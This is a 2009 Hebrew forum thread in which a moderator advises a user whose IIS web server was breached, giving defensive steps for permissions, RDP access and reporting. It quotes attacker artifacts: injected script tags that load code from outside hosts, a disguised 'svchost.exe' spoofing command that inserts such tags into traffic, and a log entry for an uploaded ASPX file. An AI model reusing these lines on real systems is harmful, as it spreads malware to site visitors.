13-03-2009, 19:27
|
|
מנהל פורום מערכות הפעלה - הרובע המייקרוסופטי.
|
|
חבר מתאריך: 07.10.04
הודעות: 13,777
|
|
כמה דברים שתוכל לעשות ספציפית נגד הדברים שמצאת
ציטוט:
במקור נכתב על ידי mediali
טוב האנטישמים האלה פרצו שוב לשרת - עליתי קצת על העקבות אבל לא בטוח איך הם עשו את זה - אז ככה :
|
הם לא בהכרח אנטישמים, הם לא מלאכים... אבל זו די אשמתך שהם פרצו ככה
ציטוט:
במקור נכתב על ידי mediali
שוב מצאתי בדפים הראשיים באתרים בIIS את ההפניה לסקריפט הבא :
<script language=javascript src=http://%6C%6E%64%65%78%2E%6E%65%74/img.gif></script>
|
אתה צריך להסיר את ההפניות האלו ידנית, תדאג שלמשתמשים רגילים (= לא אתה) אסור יהיה לשנות את הקבצים ברמת ntfs, כדי לשנות את הקבצים תוריד את החסימה, תשנה את הקבצים ושים אותה מחדש.
ציטוט:
במקור נכתב על ידי mediali
שזה מעין תוכנת מנייה.
|
עשית whois על הכתובת? אולי סתם רוצים הפניות לאתר כדי לתת לו PR גבוה? יכול להיות שלא באמת ניסו לדפוק אותך
ציטוט:
במקור נכתב על ידי mediali
|
לא נכנסתי לקבצים ובדקתי אותם, אנטי וירוס מזהה אותם כווירוסים? מה יש בפנים? אתה משתמש ב aspx? אולי פשוט להוריד את האפשרות להריץ את הקבצים האלו יספיק לך?
ציטוט:
במקור נכתב על ידי mediali
שככה"נ מאפשר להם לקבל הרבה יותר מידע על השרת ולהריץ באמצעות CMD סקריפטי VB
|
אתה משתמש בקבצי vbs או js על השרת?
אם לא אתה יכול לבטל את wscript ו cscript באמצעות מחיקה/שינוי שם/ביטול הרשאות read&execute לכולם מלבדך (או לכולם בכלל) ואז סקריפטים לא ירוצו על השרת.
ציטוט:
במקור נכתב על ידי mediali
בחיבור RDP לשרת היה סשן פתוח (שלא עשו LOGOFF אלא רק סגרו) עם CMD פתוח ועליו קוד VB שרץ - הקוד הוא קוד שמחפש את כל קבצי האינדקס של אתרי אינטרנט מוסיף להם את הפניית ה-JS
|
למה יש לך גישת RDP אל השרת? מי המשתמשים שיכולים להתחבר? תעיף את כולם דרך terminal services configurations תחת כרטסת permissions, תדאג שרק משתמשים לא אדמיניסטרטיביים יוכלו להתחבר אליו, ותדאג שלמשתמשים האלו לא תהייה גישה לספריות של האתר בכלל.
ציטוט:
במקור נכתב על ידי mediali
היה גם קובץ BAT עם הקוד הבא
svchost.exe -idx 0 -ip 00.00.00.00-225.225.225.225 -port 80 -insert "<script language=javascript src=http://www.ebfonline.com/Images/img.gif></script>" -Interval 1000 -spoofmode 2
שינית את מספרי ה-IP
אשמח אם מישהו יוכל להעיר את עיני מה הקוד הזה אמור לעשות.
|
חיפשתי קצת על הפקודה הזו, מסתבר שניסו לעשות לך spoofeattack (די ברור מהפקודה עצמה), קרא כאן להמשך:
http://isc.sans.org/diary.html?storyid=6001
ציטוט:
במקור נכתב על ידי mediali
הדבר היחיד שעשיתי עד עכשיו זה להוריד את ההפניה שהם הכניסו בדפי האתרים באמצעות search&replace ולחסום את הספריות (ב-IIS) עם הרשאת כתיבה כך שלא אפשר להריץ מתוכם קוד.
אשמח מאוד לחוות דעתכם ולעזרכתם
|
דעתי - אתה חייב עזרה מקצועית, לא חסרות חברות שמתמחות באבטחה (אני מנוע מלהמליץ כדי שלא יראו בזה פרסום, מה-גם שאני לא מכיר את כולן ואת היכולות שלהן... אז כדאי שתחפש לבד), השאלה היא עד-כמה קריטי האתר שלך, האם הוא משהו פרטי, למטרות הכנסה, שייך לחברה גדולה וכו' (לא חייב לענות כאן - מובן בהחלט אם לא תרצה להגיד, אבל תחשוב כמה שווה לך העניין)
ציטוט:
במקור נכתב על ידי mediali
נ.ב : בדקתי בקבצי הלוג לראות מי ניגש לקובץ שהועלה לספריה עם ההראשות כתיבה - יש לי את הIP שלו יש מה לעשות עם זה - הלוג כאן למטה :
2009-03-13 03:11:56 W3SVC944404638 IP ET /UserFiles/image/s/Code.aspx - 80 - 121.12.126.8 Mozilla/4.0+compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NE T+CLR+2.0.50727;+GreenBrowser) - 200 0 0 4001 348 11593
|
לא יעזור הרבה - בשנייה שתחסום אותו הוא יגלוש מפרוקסי אחר עם כתובת אחרת, אתה כן יכול להתלונן אצל הספק שלך בעניין (או במשטרה, אמורה להיות להם סוג של מחלקת עבירות טכנולוגיות או איך שהם לא קוראים לזה), מקווה שהפורץ היה לא זהיר ולא הסתיר את עצמו טוב מידי.
טוב, אני חושב שזהו כטיפול ראשוני, אני לא יודע אילו אמצעים של אבטחה יש לך... אבל כדאי לעבור על כל הנושא הזה אצלך (שוב, בהתאם לכמה שאתה תלוי באתר הזה).
_____________________________________
|